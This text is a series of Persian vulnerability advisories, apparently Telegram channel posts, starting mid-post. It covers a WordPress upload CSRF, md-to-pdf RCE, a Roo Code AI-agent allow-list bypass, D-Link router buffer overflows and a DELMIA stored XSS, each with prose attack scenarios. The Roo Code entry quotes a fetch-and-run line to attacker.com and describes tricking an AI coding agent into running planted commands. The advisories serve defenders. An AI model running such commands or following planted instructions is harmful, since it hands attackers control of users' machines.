یک مهاجم می‌تواند با فریب مدیر سایت، فایل‌های دلخواه خود (مانند وب‌شل یا بدافزار) را بر روی سرور آپلود کند.

موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) شود. این به معنای در اختیار گرفتن کنترل کامل وب‌سایت، سرقت اطلاعات حساس کاربران، تغییر چهره سایت (Defacement) و یا استفاده از سرور برای حملات گسترده‌تر است.

---

سناریوی حمله:
۱. آماده‌سازی: مهاجم یک صفحه وب مخرب یا یک لینک جعلی طراحی می‌کند. این صفحه حاوی یک فرم پنهان است که به فایل آسیب‌پذیر در سایت قربانی اشاره کرده و یک فایل مخرب (مثلاً یک وب‌شل با پسوند .php) را برای آپلود مشخص می‌کند.

۲. مهندسی اجتماعی: مهاجم از طریق ایمیل فیشینگ، پیام خصوصی یا روش‌های دیگر، مدیر سایت را که در پیشخوان وردپرس خود لاگین کرده است، ترغیب به کلیک بر روی لینک مخرب می‌کند.

۳. ارسال درخواست جعلی: به محض کلیک مدیر بر روی لینک، مرورگر او به صورت خودکار و بدون اطلاع وی، درخواست جعلی را به سایت ارسال می‌کند. از آنجایی که مدیر در سایت لاگین است، این درخواست با سطح دسترسی او ارسال می‌شود.

۴. بهره‌برداری: افزونه به دلیل نداشتن مکانیزم دفاعی در برابر CSRF، درخواست را معتبر تلقی می‌کند. سپس به دلیل عدم بررسی نوع فایل، فایل مخرب مهاجم با موفقیت بر روی سرور آپلود می‌شود.

۵. کنترل کامل: مهاجم با دسترسی مستقیم به فایل آپلود شده از طریق URL آن، می‌تواند دستورات دلخواه خود را روی سرور اجرا کرده و کنترل کامل وب‌سایت را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-65108

🔴 Risk Level: CRITICAL (Score: 10.0)

تحلیل آسیب‌پذیری | CVE-2025-65108

🗒️ توضیحات آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2025-65108 در ابزار خط فرمان md-to-pdf شناسایی شده است. این ابزار برای تبدیل فایل‌های مارک‌داون (Markdown) به PDF با استفاده از Node.js و مرورگر Chrome در حالت headless به کار می‌رود.

در نسخه‌های قبل از 5.2.5، یک نقص امنیتی در نحوه پردازش بخش front-matter فایل‌های مارک‌داون توسط کتابخانه gray-matter وجود دارد. اگر یک مهاجم بتواند یک فایل مارک‌داون با جداکننده‌های خاص جاوا اسکریپت در این بخش ایجاد کند، موتور جاوا اسکریپت در فرآیند تبدیل، کد مخرب را اجرا خواهد کرد.

💥 تاثیر:
تاثیر اصلی این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این به آن معناست که مهاجم می‌تواند با فریب قربانی برای پردازش یک فایل مخرب، دستورات دلخواه خود را بر روی سیستم یا سروری که ابزار md-to-pdf روی آن در حال اجراست، پیاده‌سازی کند.

این امر می‌تواند منجر به نشت اطلاعات حساس، نصب بدافزار و باج‌افزار، یا کنترل کامل سیستم آسیب‌دیده شود.

🎯 سناریوی حمله:
۱. مهاجم یک فایل مارک‌داون (با پسوند .md) ایجاد می‌کند که در بخش front-matter آن، یک قطعه کد جاوا اسکریپت مخرب (Payload) جاسازی شده است. این کد می‌تواند یک دستور برای برقراری ارتباط معکوس (reverse shell) به سرور مهاجم باشد.

۲. مهاجم این فایل را از طریق ایمیل، آپلود در یک سرویس، یا هر روش دیگری به دست قربانی می‌رساند. قربانی می‌تواند یک توسعه‌دهنده، یک مدیر محتوا، یا حتی یک سیستم خودکار (مانند CI/CD pipeline) باشد که از این ابزار برای تولید مستندات PDF استفاده می‌کند.

۳. به محض اینکه قربانی یا سیستم خودکار، فایل مارک‌داون مخرب را با استفاده از نسخه آسیب‌پذیر md-to-pdf برای تبدیل به PDF اجرا می‌کند، کد جاسازی‌شده در سیستم قربانی اجرا می‌شود و دسترسی به مهاجم داده می‌شود.

---

🛡️ توصیه‌های امنیتی:
برای مقابله با این تهدید، قویاً توصیه می‌شود که تمامی کاربران ابزار md-to-pdf در اسرع وقت آن را به نسخه 5.2.5 یا بالاتر ارتقا دهند.

برای به‌روزرسانی می‌توانید از دستور زیر در محیط Node.js استفاده کنید:
npm install md-to-pdf@latest

همچنین، به عنوان یک اصل امنیتی، همواره از پردازش فایل‌های دریافت شده از منابع نامعتبر خودداری کرده و ورودی‌های کاربران را پیش از پردازش، به دقت اعتبارسنجی نمایید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-65946

🟠 Risk Level: HIGH (Score: 8.1)

تحلیل آسیب‌پذیری با شناسه CVE-2025-65946

---

شرح آسیب‌پذیری:

ابزار Roo Code یک ایجنت کدنویسی خودکار مبتنی بر هوش مصنوعی است که در محیط ویرایشگر کد (Editor) کاربر فعالیت می‌کند. در نسخه‌های قبل از 3.26.7، یک نقص امنیتی در فرآیند اعتبارسنجی دستورات شناسایی شده است.

این ضعف به ایجنت Roo Code اجازه می‌دهد تا به صورت خودکار دستوراتی را اجرا کند که در لیست دستورات مجاز (Allow List) تعریف نشده‌اند. در حالت عادی، این ایجنت باید تنها دستوراتی با پیشوندهای مشخص و ایمن را اجرا کند، اما این باگ مکانیزم امنیتی مذکور را دور می‌زند. این مشکل در نسخه 3.26.7 به طور کامل برطرف شده است.

---

تأثیر:

تأثیر این آسیب‌پذیری بسیار بالا ارزیابی می‌شود. یک مهاجم می‌تواند با فریب دادن ایجنت هوش مصنوعی، دستورات دلخواه خود را بر روی سیستم قربانی اجرا کند. این حمله می‌تواند منجر به موارد زیر شود:

- اجرای کد از راه دور (Remote Code Execution - RCE)
- سرقت اطلاعات حساس مانند کلیدهای API، رمزهای عبور و اطلاعات پروژه‌ها
- نصب بدافزار یا باج‌افزار بر روی سیستم توسعه‌دهنده
- به دست گرفتن کنترل کامل سیستم قربانی

از آنجایی که ایجنت با سطح دسترسی کاربر فعلی اجرا می‌شود، هر دستوری که کاربر قادر به اجرای آن باشد، توسط مهاجم نیز قابل اجرا خواهد بود.

---

سناریوی حمله:

یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری می‌تواند به شکل زیر باشد:

۱. مهاجم یک قطعه کد یا یک دستورالعمل (Prompt) مخرب را طراحی کرده و آن را در یک منبع عمومی مانند یک پروژه متن-باز در گیت‌هاب، یک پاسخ در Stack Overflow یا یک فایل کانفیگ به اشتراک می‌گذارد.

۲. یک توسعه‌دهنده که از نسخه آسیب‌پذیر Roo Code استفاده می‌کند، این قطعه کد را در ویرایشگر خود باز کرده و از ایجنت هوش مصنوعی می‌خواهد تا آن را تحلیل، تکمیل یا بهینه‌سازی کند.

۳. به دلیل وجود باگ اعتبارسنجی، Roo Code دستور مخرب پنهان شده در کد (مثلاً curl attacker.com/payload.sh | sh) را به عنوان یک دستور مجاز تشخیص می‌دهد.

۴. در نتیجه، ایجنت به صورت خودکار دستور مخرب را روی سیستم توسعه‌دهنده اجرا می‌کند. این دستور می‌تواند یک اسکریپت جهت سرقت کلیدهای SSH یا نصب یک Backdoor برای دسترسی دائمی مهاجم به سیستم باشد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13547

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری | CVE-2025-13547
محصولات تحت تأثیر: مودم‌های D-Link

---

📄 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی از نوع تخریب حافظه (Memory Corruption) در مودم‌های D-Link مدل‌های DIR-822K و DWR-M920 با فریمور نسخه‌های 1.00_20250513164613 و 1.1.50 شناسایی شده است.

این ضعف امنیتی در فایل /boafrm/formDdns و از طریق دستکاری پارامتر submit-url قابل بهره‌برداری است. این حمله می‌تواند از راه دور و بدون نیاز به احراز هویت انجام شود.

نکته مهم: کد بهره‌برداری (Exploit) این آسیب‌پذیری به صورت عمومی منتشر شده است که ریسک حمله را به شدت افزایش می‌دهد.

⚠️ میزان تأثیر:

بهره‌برداری موفق از این آسیب‌پذیری می‌تواند به مهاجم اجازه اجرای کد از راه دور (RCE) بر روی دستگاه را بدهد. این به معنای در اختیار گرفتن کنترل کامل مودم توسط مهاجم است.

سایر پیامدهای احتمالی شامل موارد زیر است:
- از کار انداختن دستگاه (Denial of Service)
- نشت اطلاعات حساس پیکربندی
- شنود ترافیک شبکه داخلی

🎯 سناریوی حمله:

یک مهاجم در شبکه خارجی، با ارسال یک درخواست وب دستکاری‌شده و مخرب به بخش تنظیمات DDNS مودم (فایل formDdns)، یک مقدار نامعتبر را به پارامتر submit-url ارسال می‌کند. این عمل باعث سرریز بافر و تخریب حافظه شده و به مهاجم اجازه می‌دهد تا کد دلخواه خود را با سطح دسترسی مدیریتی بر روی دستگاه اجرا کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13548

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل و گزارش آسیب‌پذیری | CVE-2025-13548

گزارش خلاصه و حرفه‌ای برای ادمین‌ها و کارشناسان امنیت

---

🐛 شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع سرریز بافر (Buffer Overflow) با شناسه CVE-2025-13548 در روترهای D-Link کشف شده است. این ضعف امنیتی در فایل /boafrm/formFirewallAdv که بخشی از پنل مدیریت وب دستگاه است، وجود دارد.

مهاجم می‌تواند با ارسال یک مقدار دستکاری‌شده و طولانی در پارامتر submit-url، باعث سرریز شدن بافر حافظه شده و شرایط را برای اجرای کدهای مخرب فراهم کند. این حمله از راه دور (Remote) قابل اجراست و نیازی به دسترسی فیزیکی به دستگاه ندارد.

محصولات تحت تأثیر:
- D-Link DIR-822K
- D-Link DWR-M920

نسخه‌های آسیب‌پذیر:
- 1.00_20250513164613
- 1.1.50


💥 تأثیر:
تأثیر اصلی این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این بدان معناست که یک مهاجم می‌تواند کنترل کامل روتر را در دست بگیرد.

پیامدهای احتمالی عبارتند از:
- شنود و سرقت ترافیک شبکه (مانند رمزهای عبور و اطلاعات بانکی).
- تغییر تنظیمات DNS برای هدایت کاربران به سایت‌های فیشینگ.
- استفاده از روتر به عنوان بخشی از یک شبکه بات‌نت برای حملات DDoS.
- نصب بدافزار دائمی بر روی دستگاه.


🎯 سناریوی حمله:
مهاجم پس از شناسایی یک روتر آسیب‌پذیر که پنل مدیریت آن از طریق اینترنت در دسترس است، یک درخواست HTTP مخرب به آدرس مدیریت دستگاه ارسال می‌کند. در این درخواست، پارامتر submit-url با یک رشته کد بسیار طولانی و دستکاری‌شده پر می‌شود.

وب سرور دستگاه قادر به مدیریت این حجم از داده در بافر اختصاص داده شده نیست و سرریز رخ می‌دهد. این سرریز به مهاجم اجازه می‌دهد تا کدهای مخرب خود را در حافظه دستگاه بازنویسی کرده و با سطح دسترسی مدیر (root) اجرا کند.

نکته مهم: کد بهره‌برداری (Exploit) این آسیب‌پذیری به صورت عمومی منتشر شده است، که ریسک مورد حمله قرار گرفتن را به شدت افزایش می‌دهد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13549

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری CVE-2025-13549 در روتر D-Link

---

📄 توضیحات آسیب‌پذیری:

یک آسیب‌پذیری از نوع سرریز بافر (Buffer Overflow) با شناسه CVE-2025-13549 در روتر D-Link مدل DIR-822K نسخه 1.00 شناسایی شده است.

این ضعف امنیتی در تابع sub_455524 واقع در فایل /boafrm/formNtp قرار دارد. مهاجم از راه دور می‌تواند با ارسال مقادیر دستکاری‌شده و بیش از حد طولانی به پارامتر submit-url، این آسیب‌پذیری را مورد بهره‌برداری قرار دهد.

نکته حائز اهمیت این است که کد بهره‌برداری (Exploit) این آسیب‌پذیری به صورت عمومی منتشر شده و در دسترس همگان قرار دارد که ریسک حمله را به شدت افزایش می‌دهد.

🎯 تأثیرات:

بهره‌برداری موفقیت‌آمیز از این آسیب‌پذیری می‌تواند منجر به دو پیامد اصلی و خطرناک شود:

۱. اجرای کد از راه دور (Remote Code Execution - RCE): در بدترین حالت، مهاجم می‌تواند کنترل کامل روتر را در دست بگیرد. این به معنای شنود ترافیک شبکه، دسترسی به دستگاه‌های متصل به شبکه داخلی (مانند کامپیوترها و دوربین‌ها) و استفاده از روتر برای حملات بیشتر است.

۲. منع سرویس (Denial of Service - DoS): مهاجم می‌تواند با ارسال درخواست‌های مخرب، باعث از کار افتادن (Crash) کامل روتر و در نتیجه، قطع دسترسی تمامی کاربران متصل به شبکه به اینترنت شود.

🎭 سناریو حمله:

یک مهاجم از راه دور، با اسکن کردن اینترنت، روترهای آسیب‌پذیر D-Link مدل DIR-822K را شناسایی می‌کند.

سپس، یک درخواست وب دستکاری‌شده به پنل مدیریتی روتر (به‌طور خاص به فایل /boafrm/formNtp) ارسال می‌کند. این درخواست حاوی یک مقدار بسیار طولانی و مخرب در پارامتر submit-url است که بلندتر از فضای بافرِ در نظر گرفته شده در برنامه می‌باشد.

در نتیجه، سرریز بافر رخ داده و مهاجم موفق به بازنویسی حافظه و اجرای کدهای دلخواه خود با سطح دسترسی دستگاه می‌شود. در نهایت، مهاجم کنترل کامل روتر را به دست آورده و می‌تواند از آن به عنوان نقطه‌ای برای حملات بعدی یا جاسوسی از شبکه داخلی استفاده نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13550

🟠 Risk Level: HIGH (Score: 8.8)

🚨 گزارش تحلیل آسیب‌پذیری | CVE-2025-13550 🚨

شرح آسیب‌پذیری:
یک آسیب‌پذیری بحرانی از نوع سرریز بافر (Buffer Overflow) با شناسه CVE-2025-13550 در دستگاه‌های D-Link شناسایی شده است. این ضعف امنیتی در فایل /boafrm/formVpnConfigSetup و در پردازش پارامتر submit-url قرار دارد.

مهاجم از راه دور می‌تواند با ارسال یک مقدار دستکاری‌شده و طولانی برای این پارامتر، موجب سرریز شدن بافر حافظه شود. کد بهره‌برداری (Exploit) برای این آسیب‌پذیری به صورت عمومی منتشر شده و به طور فعال قابل استفاده است.

دستگاه‌های تحت تأثیر:
▪️ D-Link DIR-822K
▪️ D-Link DWR-M920

نسخه‌های فریم‌ور آسیب‌پذیر:
▪️ 1.00_20250513164613
▪️ 1.1.50

تأثیر:
موفقیت‌آمیز بودن این حمله می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) بر روی دستگاه آسیب‌دیده شود. این به معنای آن است که مهاجم کنترل کامل روتر را در دست می‌گیرد و قادر خواهد بود:

▪️ ترافیک شبکه را شنود و دستکاری کند.
▪️ به دستگاه‌های موجود در شبکه داخلی حمله کند.
▪️ بدافزار یا درهای پشتی (Backdoors) برای دسترسی پایدار نصب کند.
▪️ تنظیمات دستگاه (مانند DNS) را برای هدایت کاربران به سایت‌های مخرب تغییر دهد.

در نتیجه، امنیت و حریم خصوصی کل شبکه به خطر می‌افتد.

سناریوی حمله:
۱. مهاجم با اسکن اینترنت، روترهای D-Link آسیب‌پذیر را که از راه دور قابل دسترس هستند، شناسایی می‌کند.

۲. سپس، یک درخواست HTTP مخرب به صفحه /boafrm/formVpnConfigSetup دستگاه ارسال می‌کند.

۳. این درخواست حاوی یک مقدار بسیار طولانی و دستکاری‌شده در پارامتر submit-url است که شامل کد مخرب (Shellcode) می‌باشد.

۴. پردازش این مقدار توسط روتر منجر به سرریز بافر شده و کد مخرب مهاجم با سطح دسترسی مدیریتی (root) بر روی سیستم‌عامل دستگاه اجرا می‌شود. در این لحظه، مهاجم کنترل کامل دستگاه را به دست آورده است.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13551

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری CVE-2025-13551
گزارش خلاصه و حرفه‌ای برای کانال تلگرام

---

آسیب‌پذیری:
یک آسیب‌پذیری از نوع سرریز بافر (Buffer Overflow) با شناسه CVE-2025-13551 در مودم/روترهای D-Link مدل‌های DIR-822K و DWR-M920 با نسخه‌های فریم‌ور 1.00_20250513164613 و 1.1.50 شناسایی شده است.

این ضعف امنیتی در فایل /boafrm/formWanConfigSetup و به دلیل عدم بررسی صحیح ورودی در پارامتر submit-url وجود دارد. یک مهاجم از راه دور می‌تواند با ارسال یک درخواست دستکاری‌شده، این آسیب‌پذیری را مورد بهره‌برداری قرار دهد.

تأثیر:
موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی (root) بر روی دستگاه آسیب‌دیده شود.

این امر به مهاجم اجازه می‌دهد تا کنترل کامل دستگاه را به دست گرفته، ترافیک شبکه را شنود کند، اطلاعات کاربران را به سرقت ببرد، دستگاه را به بخشی از یک بات‌نت (Botnet) تبدیل کرده و از آن به عنوان نقطه‌ای برای حمله به سایر دستگاه‌های موجود در شبکه داخلی استفاده نماید. در سناریوهای ساده‌تر، حمله می‌تواند منجر به از کار افتادن کامل دستگاه و ایجاد اختلال در سرویس (Denial of Service) شود.

سناریو:
یک مهاجم با اسکن اینترنت، دستگاه‌های آسیب‌پذیر را که پنل مدیریت آن‌ها از طریق اینترنت در دسترس است، شناسایی می‌کند. سپس، با ارسال یک درخواست HTTP مخرب به فایل /boafrm/formWanConfigSetup که حاوی یک مقدار بسیار طولانی و دستکاری‌شده برای پارامتر submit-url است، باعث سرریز شدن بافر در حافظه دستگاه می‌شود.

این سرریز به مهاجم اجازه می‌دهد تا کد دلخواه خود را در حافظه دستگاه تزریق و اجرا کند. با توجه به اینکه کد بهره‌برداری (Exploit) از این آسیب‌پذیری به صورت عمومی منتشر شده است، انتظار می‌رود حملات گسترده‌ای با استفاده از آن صورت گیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13553

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری CVE-2025-13553

---

آسیب‌پذیری:
یک آسیب‌پذیری حیاتی از نوع سرریز بافر (Buffer Overflow) در فریم‌ور نسخه 1.1.50 مودم-روتر D-Link مدل DWR-M920 شناسایی شده است.

این ضعف امنیتی در تابع sub_41C7FC واقع در فایل /boafrm/formPinManageSetup قرار دارد. آسیب‌پذیری از طریق ارسال یک مقدار دستکاری‌شده و بیش از حد طولانی به آرگومان submit-url در این فایل، قابل بهره‌برداری است.

لازم به ذکر است که اکسپلویت این آسیب‌پذیری به صورت عمومی منتشر شده است.

تأثیر:
مهاجم از راه دور (Remote) و بدون نیاز به احراز هویت، می‌تواند با بهره‌برداری از این آسیب‌پذیری، کد دلخواه خود را بر روی دستگاه اجرا کند (Remote Code Execution - RCE).

اجرای موفقیت‌آمیز این حمله می‌تواند منجر به در اختیار گرفتن کامل کنترل دستگاه، سرقت اطلاعات حساس (مانند اطلاعات کاربری و رمزهای عبور)، شنود ترافیک شبکه و یا استفاده از دستگاه به عنوان بخشی از یک شبکه بات‌نت (Botnet) شود. با توجه به عمومی بودن اکسپلویت، ریسک بهره‌برداری از این ضعف بالا ارزیابی می‌شود.

سناریو:
یک مهاجم با اسکن اینترنت، دستگاه‌های آسیب‌پذیر D-Link مدل DWR-M920 که از اینترنت قابل دسترس هستند را شناسایی می‌کند.

سپس، یک درخواست HTTP مخرب به صفحه مدیریت پین دستگاه (/boafrm/formPinManageSetup) ارسال می‌کند.

در این درخواست، پارامتر submit-url با یک رشته بسیار طولانی که حاوی کدهای مخرب (Shellcode) است، پر می‌شود. پردازش این درخواست توسط وب‌سرور دستگاه منجر به سرریز بافر شده و کد مخرب مهاجم با سطح دسترسی بالا بر روی سیستم‌عامل روتر اجرا می‌گردد. در این مرحله، مهاجم کنترل کامل دستگاه را به دست می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-10555

🟠 Risk Level: HIGH (Score: 8.7)

تحلیل آسیب‌پذیری: CVE-2025-10555

گزارش خلاصه آسیب‌پذیری امنیتی شناسایی شده در پلتفرم DELMIA Service Process Engineer

---

شرح آسیب‌پذیری: Vulnerability Description

یک آسیب‌پذیری از نوع Stored Cross-site Scripting (XSS) با شناسه CVE-2025-10555 در بخش مدیریت آیتم‌های سرویس (Service Items Management) در پلتفرم DELMIA Service Process Engineer نسخه R2025x شناسایی شده است.

این ضعف امنیتی به دلیل عدم اعتبارسنجی و پاک‌سازی صحیح داده‌های ورودی کاربر به وجود آمده است. این امر به مهاجم اجازه می‌دهد تا اسکریپت‌های مخرب خود را در پایگاه داده سیستم ذخیره کند. هر زمان که کاربر دیگری داده‌های آلوده را مشاهده کند، این اسکریپت‌ها در نشست مرورگر وی اجرا می‌شوند.

میزان تأثیر: Impact

با توجه به ماهیت Stored XSS که در آن پی‌لود مخرب به صورت دائمی در سرور ذخیره می‌شود، این آسیب‌پذیری دارای سطح خطر بالا ارزیابی می‌شود. پیامدهای اصلی آن عبارتند از:

▪️سرقت نشست کاربری (Session Hijacking): مهاجم می‌تواند کوکی‌های نشست کاربران، از جمله مدیران سیستم، را به سرقت برده و به حساب کاربری آن‌ها دسترسی کامل پیدا کند.

▪️سرقت اطلاعات اعتباری: امکان اجرای اسکریپت‌های فیشینگ برای دزدیدن نام کاربری و رمز عبور کاربران وجود دارد.

▪️تغییر و تخریب محتوای صفحه (Defacement): مهاجم می‌تواند ظاهر و محتوای صفحات را برای سایر کاربران تغییر دهد و اطلاعات نادرست نمایش دهد.

▪️انتشار بدافزار: هدایت کاربران به سایت‌های مخرب و آلوده کردن سیستم آن‌ها از طریق اجرای کدهای مخرب.

سناریوی حمله: Scenario

یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

۱. مهاجم یک پی‌لود (Payload) مخرب جاوا اسکریپت را در یکی از فیلدهای ورودی بخش Service Items Management وارد می‌کند؛ برای مثال، در قسمت توضیحات یک آیتم سرویس جدید.

۲. سیستم بدون پاک‌سازی صحیح، این کد مخرب را در پایگاه داده خود ذخیره می‌کند.

۳. یک کاربر دیگر با سطح دسترسی بالاتر (مثلاً یک مدیر) برای مشاهده یا ویرایش همان آیتم به صفحه مربوطه مراجعه می‌کند.

۴. با بارگذاری صفحه، سرور داده‌های آلوده را از پایگاه داده فراخوانی کرده و برای مرورگر کاربر ارسال می‌کند. مرورگر کاربر به اسکریپت مخرب اعتماد کرده و آن را در چارچوب نشست کاربر قربانی اجرا می‌کند.

۵. در این لحظه، بسته به نوع پی‌لود، اطلاعات حساس نشست کاربر (مانند Session ID) برای سرور تحت کنترل مهاجم ارسال شده و حساب کاربری قربانی به طور کامل در اختیار مهاجم قرار می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal